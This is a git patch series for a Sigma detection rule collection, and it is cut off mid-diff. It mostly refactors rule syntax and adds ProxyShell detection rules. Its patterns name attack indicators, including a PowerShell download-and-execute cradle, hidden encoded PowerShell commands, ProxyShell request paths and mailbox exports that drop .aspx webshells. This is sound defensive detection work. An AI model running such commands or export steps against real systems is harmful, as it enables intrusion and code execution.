a/rules/network/net_susp_dns_b64_queries.yml b/rules/network/net_susp_dns_b64_queries.yml index 6031ac58..c235127d 100644 --- a/rules/network/net_susp_dns_b64_queries.yml +++ b/rules/network/net_susp_dns_b64_queries.yml @@ -4,15 +4,14 @@ status: experimental description: Detects suspicious DNS queries using base64 encoding author: Florian Roth date: 2018/05/10 -modified: 2020/08/27 +modified: 2021/08/09 references: - https://github.com/krmaxwell/dns-exfiltration logsource: category: dns detection: selection: - query|contains: - - '==.' + query|contains: '==.' condition: selection falsepositives: - Unknown diff --git a/rules/network/net_susp_telegram_api.yml b/rules/network/net_susp_telegram_api.yml index 438406b5..4e813ed8 100644 --- a/rules/network/net_susp_telegram_api.yml +++ b/rules/network/net_susp_telegram_api.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind author: Florian Roth date: 2018/06/05 -modified: 2020/08/27 +modified: 2021/08/09 references: - https://core.telegram.org/bots/faq - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/ @@ -14,8 +14,7 @@ logsource: category: dns detection: selection: - query: - - 'api.telegram.org' # Telegram Bot API Request https://core.telegram.org/bots/faq + query: 'api.telegram.org' # Telegram Bot API Request https://core.telegram.org/bots/faq condition: selection falsepositives: - Legitimate use of Telegram bots in the company diff --git a/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml b/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml index d0c169d4..953c84a7 100644 --- a/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml +++ b/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml @@ -4,13 +4,12 @@ status: experimental description: Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ author: Florian Roth date: 2019/03/07 -modified: 2020/09/03 +modified: 2021/08/09 logsource: category: proxy detection: selection: - c-useragent|startswith: - - 'Microsoft BITS/' + c-useragent|startswith: 'Microsoft BITS/' falsepositives: r-dns|endswith: - '.com' diff --git a/rules/proxy/proxy_ua_suspicious.yml b/rules/proxy/proxy_ua_suspicious.yml index 6f3472f1..7f7f82e7 100644 --- a/rules/proxy/proxy_ua_suspicious.yml +++ b/rules/proxy/proxy_ua_suspicious.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious malformed user agent strings in proxy logs author: Florian Roth date: 2017/07/08 -modified: 2020/09/03 +modified: 2021/08/09 references: - https://github.com/fastly/waf_testbed/blob/master/templates/default/scanners-user-agents.data.erb logsource: @@ -32,8 +32,7 @@ detection: - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # used by APT28 malware https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html - 'HTTPS' # https://twitter.com/stvemillertime/status/1204437531632250880 falsepositives: - c-useragent: - - 'Mozilla/3.0 * Acrobat *' # Acrobat with linked content + c-useragent: 'Mozilla/3.0 * Acrobat *' # Acrobat with linked content condition: ( selection1 or selection2 or selection3 ) and not falsepositives fields: - ClientIP diff --git a/rules/proxy/proxy_ursnif_malware.yml b/rules/proxy/proxy_ursnif_malware_c2_url.yml similarity index 62% rename from rules/proxy/proxy_ursnif_malware.yml rename to rules/proxy/proxy_ursnif_malware_c2_url.yml index 1445ed4f..c1e0b5ca 100644 --- a/rules/proxy/proxy_ursnif_malware.yml +++ b/rules/proxy/proxy_ursnif_malware_c2_url.yml @@ -1,29 +1,3 @@ -title: Ursnif Malware Download URL Pattern -id: a36ce77e-30db-4ea0-8795-644d7af5dfb4 -status: stable -description: Detects download of Ursnif malware done by dropper documents. -author: Thomas Patzke -date: 2019/12/19 -modified: 2020/11/28 -logsource: - category: proxy -detection: - selection: - c-uri|contains|all: - - '/' - - '.php?l=' - c-uri|endswith: '.cab' - sc-status: 200 - condition: selection -fields: - - c-ip - - c-uri - - sc-bytes - - c-ua -falsepositives: - - Unknown -level: critical ---- title: Ursnif Malware C2 URL Pattern id: 932ac737-33ca-4afd-9869-0d48b391fcc9 status: stable @@ -31,6 +5,8 @@ description: Detects Ursnif C2 traffic. references: - https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html author: Thomas Patzke +date: 2019/12/19 +modified: 2021/08/09 logsource: category: proxy detection: diff --git a/rules/proxy/proxy_ursnif_malware_download_url.yml b/rules/proxy/proxy_ursnif_malware_download_url.yml new file mode 100644 index 00000000..764eabfb --- /dev/null +++ b/rules/proxy/proxy_ursnif_malware_download_url.yml @@ -0,0 +1,25 @@ +title: Ursnif Malware Download URL Pattern +id: a36ce77e-30db-4ea0-8795-644d7af5dfb4 +status: stable +description: Detects download of Ursnif malware done by dropper documents. +author: Thomas Patzke +date: 2019/12/19 +modified: 2021/08/09 +logsource: + category: proxy +detection: + selection: + c-uri|contains|all: + - '/' + - '.php?l=' + c-uri|endswith: '.cab' + sc-status: 200 + condition: selection +fields: + - c-ip + - c-uri + - sc-bytes + - c-ua +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/web/web_citrix_cve_2020_8193_8195_exploit.yml b/rules/web/web_citrix_cve_2020_8193_8195_exploit.yml index 7e332931..4d65fbdf 100644 --- a/rules/web/web_citrix_cve_2020_8193_8195_exploit.yml +++ b/rules/web/web_citrix_cve_2020_8193_8195_exploit.yml @@ -4,6 +4,7 @@ id: 0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7 author: Florian Roth status: experimental date: 2020/07/10 +modified: 2021/08/09 references: - https://support.citrix.com/article/CTX276688 - https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/ @@ -12,8 +13,7 @@ logsource: category: webserver detection: selection1: - c-uri|contains: - - '/rapi/filedownload?filter=path:%2F' + c-uri|contains: '/rapi/filedownload?filter=path:%2F' selection2: c-uri|contains|all: - '/pcidss/report' diff --git a/rules/web/web_cve_2018_2894_weblogic_exploit.yml b/rules/web/web_cve_2018_2894_weblogic_exploit.yml index 4836bb20..cb39d1fb 100644 --- a/rules/web/web_cve_2018_2894_weblogic_exploit.yml +++ b/rules/web/web_cve_2018_2894_weblogic_exploit.yml @@ -4,7 +4,7 @@ status: experimental description: Detects access to a webshell dropped into a keystore folder on the WebLogic server author: Florian Roth date: 2018/07/22 -modified: 2020/09/03 +modified: 2021/08/09 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894 - https://twitter.com/pyn3rd/status/1020620932967223296 @@ -13,8 +13,7 @@ logsource: category: webserver detection: selection: - c-uri: - - '*/config/keystore/*.js*' + c-uri: '*/config/keystore/*.js*' condition: selection fields: - c-ip diff --git a/rules/web/web_solarwinds_supernova_webshell.yml b/rules/web/web_solarwinds_supernova_webshell.yml index 895a85fd..ec43bcd2 100644 --- a/rules/web/web_solarwinds_supernova_webshell.yml +++ b/rules/web/web_solarwinds_supernova_webshell.yml @@ -4,7 +4,7 @@ status: experimental description: Detects access to SUPERNOVA webshell as described in Guidepoint report author: Florian Roth date: 2020/12/17 -modified: 2020/12/22 +modified: 2021/08/09 references: - https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/ - https://www.anquanke.com/post/id/226029 @@ -19,8 +19,7 @@ detection: - 'logoimagehandler.ashx' - 'clazz' selection2: - c-uri|contains: - - 'logoimagehandler.ashx' + c-uri|contains: 'logoimagehandler.ashx' sc-status: 500 condition: selection1 or selection2 fields: diff --git a/rules/web/web_vsphere_cve_2021_21972_unauth_rce_exploit.yml b/rules/web/web_vsphere_cve_2021_21972_unauth_rce_exploit.yml index 952a50f5..30d7e237 100644 --- a/rules/web/web_vsphere_cve_2021_21972_unauth_rce_exploit.yml +++ b/rules/web/web_vsphere_cve_2021_21972_unauth_rce_exploit.yml @@ -4,6 +4,7 @@ status: experimental description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972 author: Bhabesh Raj date: 2021/02/24 +modified: 2021/08/09 references: - https://www.vmware.com/security/advisories/VMSA-2021-0002.html - https://f5.pm/go-59627.html @@ -13,8 +14,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri: - - '/ui/vropspluginui/rest/services/uploadova' + c-uri: '/ui/vropspluginui/rest/services/uploadova' condition: selection fields: - c-ip diff --git a/rules/web/win_powershell_snapins_hafnium.yml b/rules/web/win_powershell_snapins_hafnium.yml index 11ffd789..3c35f816 100644 --- a/rules/web/win_powershell_snapins_hafnium.yml +++ b/rules/web/win_powershell_snapins_hafnium.yml @@ -7,6 +7,7 @@ references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ date: 2021/03/03 +modified: 2021/08/09 tags: - attack.execution - attack.t1086 @@ -19,8 +20,7 @@ logsource: detection: selection: Image: '*\powershell.exe' - CommandLine: - - '*add-pssnapin microsoft.exchange.powershell.snapin*' + CommandLine: '*add-pssnapin microsoft.exchange.powershell.snapin*' condition: selection fields: - CommandLine From a9ad4eda4adf114866cddc33433dbfba4f3e87e0 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 9 Aug 2021 17:57:34 +0200 Subject: [PATCH 0266/1367] rules: ProxyShell refactoring and new rule --- rules/web/web_exchange_proxyshell.yml | 8 +++-- .../web_exchange_proxyshell_successful.yml | 31 +++++++++++++++++++ .../win_exchange_proxyshell_mailboxexport.yml | 30 ++++++++++++++++++ 3 files changed, 66 insertions(+), 3 deletions(-) create mode 100644 rules/web/web_exchange_proxyshell_successful.yml create mode 100644 rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index abcd6c03..e9017771 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -1,7 +1,7 @@ title: Exchange ProxyShell Pattern id: 23eee45e-933b-49f9-ae1b-df706d2d52ef status: experimental -description: Detects URP patterns that could be found in ProxyShell exloitation attempts against Exchange servers +description: Detects URP patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html @@ -22,6 +22,8 @@ detection: - '/mapi/nspi' - '/EWS' - 'X-Rps-CAT' + selection: + sc-status: 401 selection_poc: c-uri|contains: # since we don't know how it will appear in the log files, we'll just use all versions @@ -32,5 +34,5 @@ detection: - 'json?@foo.com' condition: selection_auto and selection_uri or selection_poc falsepositives: - - Could only be an attempt and not a successful attack -level: high \ No newline at end of file + - Unknown +level: medium \ No newline at end of file diff --git a/rules/web/web_exchange_proxyshell_successful.yml b/rules/web/web_exchange_proxyshell_successful.yml new file mode 100644 index 00000000..a4dd76a0 --- /dev/null +++ b/rules/web/web_exchange_proxyshell_successful.yml @@ -0,0 +1,31 @@ +title: Successful Exchange ProxyShell Attack +id: 992be1eb-e5da-437e-9a54-6d13b57bb4d8 +status: experimental +description: Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers +references: + - https://youtu.be/5mqid-7zp8k?t=2231 + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 +author: Florian Roth, Rich Warren +date: 2021/08/09 +tags: + - attack.initial_access +logsource: + category: webserver +detection: + selection_auto: + c-uri|contains: '/autodiscover.json' + selection_uri: + c-uri|contains: + - '/powershell' + - '/mapi/nspi' + - '/EWS' + - 'X-Rps-CAT' + selection_success: + sc-status: + - 200 + - 301 + condition: selection_auto and selection_uri and selection_success +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml new file mode 100644 index 00000000..7c5970f5 --- /dev/null +++ b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml @@ -0,0 +1,30 @@ +title: ProxyShell MSExchange MailBox Export Pattern +id: 516376b4-05cd-4122-bae0-ad7641c38d48 +status: experimental +description: Detects specific patterns found after a successful ProxyShell exploitation in relation to a Commandlet invokation of New-MailboxExportRequest +references: + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html?m=1 +author: Florian Roth, Rich Warren +date: 2021/08/09 +logsource: + product: windows + service: msexchange-management +detection: + selection_cmdlet: + Message|contains|all: + - 'New-MailboxExport-Request' + - ' -Mailbox ' + selection_params: + Message|contains: + - '-FilePath "\\localhost\C$' + - '-FilePath "\\127.0.0.1\C$' + - '.aspx' + selection_assignment: + Message|contains|all: + - 'New-ManagementRoleAssignment' + - ' -Role "Mailbox Import Export"' + - ' -User "exchange.admin"' + condition: selection_cmdlet and selection_params or selection_assignment +falsepositives: + - Unlikely +level: critical \ No newline at end of file From dbf8aecd83dfac73131468fb7059f8703c5a4412 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 9 Aug 2021 18:05:51 +0200 Subject: [PATCH 0267/1367] fix: typo in cmdlet name --- .../process_creation/win_exchange_proxyshell_mailboxexport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml index 7c5970f5..335ad125 100644 --- a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml +++ b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml @@ -12,7 +12,7 @@ logsource: detection: selection_cmdlet: Message|contains|all: - - 'New-MailboxExport-Request' + - 'New-MailboxExportRequest' - ' -Mailbox ' selection_params: Message|contains: From 78e0e570dd47effeab9a1cfa2c76af409b2c1a91 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 9 Aug 2021 20:23:35 +0200 Subject: [PATCH 0268/1367] Split PR 1802 builtin net rules --- rules/windows/builtin/win_account_discovery.yml | 5 ++--- rules/windows/builtin/win_ad_user_enumeration.yml | 7 ++++--- .../builtin/win_alert_active_directory_user_control.yml | 8 +++----- .../windows/builtin/win_alert_enable_weak_encryption.yml | 4 ++-- rules/windows/builtin/win_alert_ruler.yml | 5 ++--- .../win_arbitrary_shell_execution_via_settingcontent.yml | 5 ++--- .../windows/builtin/win_cobaltstrike_service_installs.yml | 8 +++----- rules/windows/builtin/win_dcsync.yml | 5 ++--- rules/windows/builtin/win_external_device.yml | 5 ++--- .../builtin/win_hybridconnectionmgr_svc_installation.yml | 4 ++-- .../builtin/win_invoke_obfuscation_stdin+_services.yml | 4 ++-- .../builtin/win_invoke_obfuscation_var+_services.yml | 4 ++-- .../win_invoke_obfuscation_via_compress_services.yml | 4 ++-- .../win_invoke_obfuscation_via_rundll_services.yml | 4 ++-- .../builtin/win_invoke_obfuscation_via_stdin_services.yml | 4 ++-- .../win_invoke_obfuscation_via_use_clip_services.yml | 4 ++-- .../win_invoke_obfuscation_via_use_mshta_services.yml | 4 ++-- .../win_invoke_obfuscation_via_use_rundll32_services.yml | 4 ++-- .../builtin/win_invoke_obfuscation_via_var++_services.yml | 3 ++- .../win_susp_failed_logons_explicit_credentials.yml | 3 ++- rules/windows/builtin/win_susp_raccess_sensitive_fext.yml | 5 ++--- rules/windows/builtin/win_vul_cve_2020_0688.yml | 5 ++--- rules/windows/builtin/win_vul_cve_2020_1472.yml | 4 ++-- 23 files changed, 50 insertions(+), 58 deletions(-) diff --git a/rules/windows/builtin/win_account_discovery.yml b/rules/windows/builtin/win_account_discovery.yml index a6705cb8..017048ad 100644 --- a/rules/windows/builtin/win_account_discovery.yml +++ b/rules/windows/builtin/win_account_discovery.yml @@ -10,7 +10,7 @@ tags: status: experimental author: Samir Bousseaden date: 2019/04/03 -modified: 2020/08/23 +modified: 2021/09/08 logsource: product: windows service: security @@ -32,8 +32,7 @@ detection: - '-544' - '-551' - '-555' - - ObjectName|contains: - - 'admin' + - ObjectName|contains: 'admin' condition: selection and selection_object falsepositives: - if source account name is not an admin then its super suspicious diff --git a/rules/windows/builtin/win_ad_user_enumeration.yml b/rules/windows/builtin/win_ad_user_enumeration.yml index 58639e2b..85a1ac96 100644 --- a/rules/windows/builtin/win_ad_user_enumeration.yml +++ b/rules/windows/builtin/win_ad_user_enumeration.yml @@ -3,7 +3,7 @@ id: ab6bffca-beff-4baa-af11-6733f296d57a description: Detects access to a domain user from a non-machine account status: experimental date: 2020/03/30 -modified: 2020/08/23 +modified: 2021/08/09 author: Maxime Thiebaut (@0xThiebaut) references: - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf @@ -20,8 +20,9 @@ logsource: detection: selection: EventID: 4662 - ObjectType|contains: # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}" - - 'bf967aba-0de6-11d0-a285-00aa003049e2' # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user) + ObjectType|contains: 'bf967aba-0de6-11d0-a285-00aa003049e2' + # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}" + # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user) filter: - SubjectUserName|endswith: '$' # Exclude machine accounts - SubjectUserName|startswith: 'MSOL_' # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account diff --git a/rules/windows/builtin/win_alert_active_directory_user_control.yml b/rules/windows/builtin/win_alert_active_directory_user_control.yml index 078f02eb..8825ab11 100644 --- a/rules/windows/builtin/win_alert_active_directory_user_control.yml +++ b/rules/windows/builtin/win_alert_active_directory_user_control.yml @@ -8,7 +8,7 @@ references: - https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ author: '@neu5ron' date: 2017/07/30 -modified: 2020/08/23 +modified: 2021/08/09 logsource: product: windows service: security @@ -16,10 +16,8 @@ logsource: detection: selection: EventID: 4704 - keywords: - Message|contains: - - 'SeEnableDelegationPrivilege' - condition: all of them + Message|contains: 'SeEnableDelegationPrivilege' + condition: selection falsepositives: - Unknown level: high diff --git a/rules/windows/builtin/win_alert_enable_weak_encryption.yml b/rules/windows/builtin/win_alert_enable_weak_encryption.yml index c0904ce5..abc236e0 100644 --- a/rules/windows/builtin/win_alert_enable_weak_encryption.yml +++ b/rules/windows/builtin/win_alert_enable_weak_encryption.yml @@ -6,6 +6,7 @@ references: - https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ author: '@neu5ron' date: 2017/07/30 +modified: 2021/08/09 tags: - attack.defense_evasion - attack.t1089 # an old one @@ -23,8 +24,7 @@ detection: - 'Preauth' - 'Encrypted' filters: - Message|contains: - - 'Enabled' + Message|contains: 'Enabled' condition: selection and keywords and filters falsepositives: - Unknown diff --git a/rules/windows/builtin/win_alert_ruler.yml b/rules/windows/builtin/win_alert_ruler.yml index ddd9ebab..4702434c 100644 --- a/rules/windows/builtin/win_alert_ruler.yml +++ b/rules/windows/builtin/win_alert_ruler.yml @@ -3,7 +3,7 @@ id: 24549159-ac1b-479c-8175-d42aea947cae description: This events that are generated when using the hacktool Ruler by Sensepost author: Florian Roth date: 2017/05/31 -modified: 2019/07/26 +modified: 2021/08/09 references: - https://github.com/sensepost/ruler - https://github.com/sensepost/ruler/issues/47 @@ -23,8 +23,7 @@ logsource: service: security detection: selection1: - EventID: - - 4776 + EventID: 4776 Workstation: 'RULER' selection2: EventID: diff --git a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml index 49d00cae..659c0e75 100644 --- a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml +++ b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml @@ -3,7 +3,7 @@ id: 24de4f3b-804c-4165-b442-5a06a2302c7e description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. author: Sreeman date: 2020/13/03 -modified: 2021/06/11 +modified: 2021/08/09 references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 tags: @@ -18,8 +18,7 @@ detection: selection: CommandLine|contains: '.SettingContent-ms' filter: - FilePath|contains: - - 'immersivecontrolpanel' + FilePath|contains: 'immersivecontrolpanel' condition: selection and not filter falsepositives: - unknown diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index 5285feef..a52c5ed2 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -6,7 +6,7 @@ references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ date: 2021/05/26 -modified: 2021/07/31 +modified: 2021/08/09 tags: - attack.execution - attack.privilege_escalation @@ -30,11 +30,9 @@ detection: - 'start' - 'powershell' selection3: - ServiceFileName|contains: - - 'powershell -nop -w hidden -encodedcommand' + ServiceFileName|contains: 'powershell -nop -w hidden -encodedcommand' selection4: - ServiceFileName|base64offset|contains: - - "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + ServiceFileName|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" condition: selection_id and (selection1 or selection2 or selection3 or selection4) falsepositives: - Unknown diff --git a/rules/windows/builtin/win_dcsync.yml b/rules/windows/builtin/win_dcsync.yml index d4406838..d5645706 100644 --- a/rules/windows/builtin/win_dcsync.yml +++ b/rules/windows/builtin/win_dcsync.yml @@ -3,7 +3,7 @@ id: 611eab06-a145-4dfa-a295-3ccc5c20f59a description: Detects Mimikatz DC sync security events status: experimental date: 2018/06/03 -modified: 2020/09/11 +modified: 2021/08/09 author: Benjamin Delpy, Florian Roth, Scott Dermott references: - https://twitter.com/gentilkiwi/status/1003236624925413376 @@ -29,8 +29,7 @@ detection: - 'NT AUTHORITY' - 'MSOL_' filter3: - SubjectUserName|endswith: - - '$' + SubjectUserName|endswith: '$' condition: selection and not filter1 and not filter2 and not filter3 falsepositives: - Valid DC Sync that is not covered by the filters; please report diff --git a/rules/windows/builtin/win_external_device.yml b/rules/windows/builtin/win_external_device.yml index 927efa23..9a64bb7a 100644 --- a/rules/windows/builtin/win_external_device.yml +++ b/rules/windows/builtin/win_external_device.yml @@ -4,7 +4,7 @@ description: Detects external diskdrives or plugged in USB devices , EventID 641 status: experimental author: Keith Wright date: 2019/11/20 -modified: 2021/07/06 +modified: 2021/08/09 tags: - attack.t1091 - attack.t1200 @@ -15,8 +15,7 @@ logsource: service: security detection: selection: - EventID: - - 6416 + EventID: 6416 ClassName: 'DiskDrive' selection2: DeviceDescription: 'USB Mass Storage Device' diff --git a/rules/windows/builtin/win_hybridconnectionmgr_svc_installation.yml b/rules/windows/builtin/win_hybridconnectionmgr_svc_installation.yml index 8731d1f9..151ec7dd 100644 --- a/rules/windows/builtin/win_hybridconnectionmgr_svc_installation.yml +++ b/rules/windows/builtin/win_hybridconnectionmgr_svc_installation.yml @@ -3,6 +3,7 @@ id: 0ee4d8a5-4e67-4faf-acfa-62a78457d1f2 description: Rule to detect the Hybrid Connection Manager service installation. status: experimental date: 2021/04/12 +modified: 2021/08/09 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.persistence @@ -13,8 +14,7 @@ logsource: service: security detection: selection: - EventID: - - 4697 + EventID: 4697 ServiceName: HybridConnectionManager ServiceFileName|contains: HybridConnectionManager condition: selection diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml index 3e8313bf..1345ea6c 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml index 317760bd..366fea97 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated use of Environment Variables to execute PowerShe status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/06/10 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: all of them --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml index 9664661b..2ec58024 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) tags: @@ -18,7 +18,7 @@ falsepositives: level: medium detection: selection: - - ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml index fcf7920e..e6925517 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: @@ -18,7 +18,7 @@ falsepositives: level: medium detection: selection: - - ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml index df37801a..01baa20f 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/12 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml index 2bb42aec..701415bd 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml index 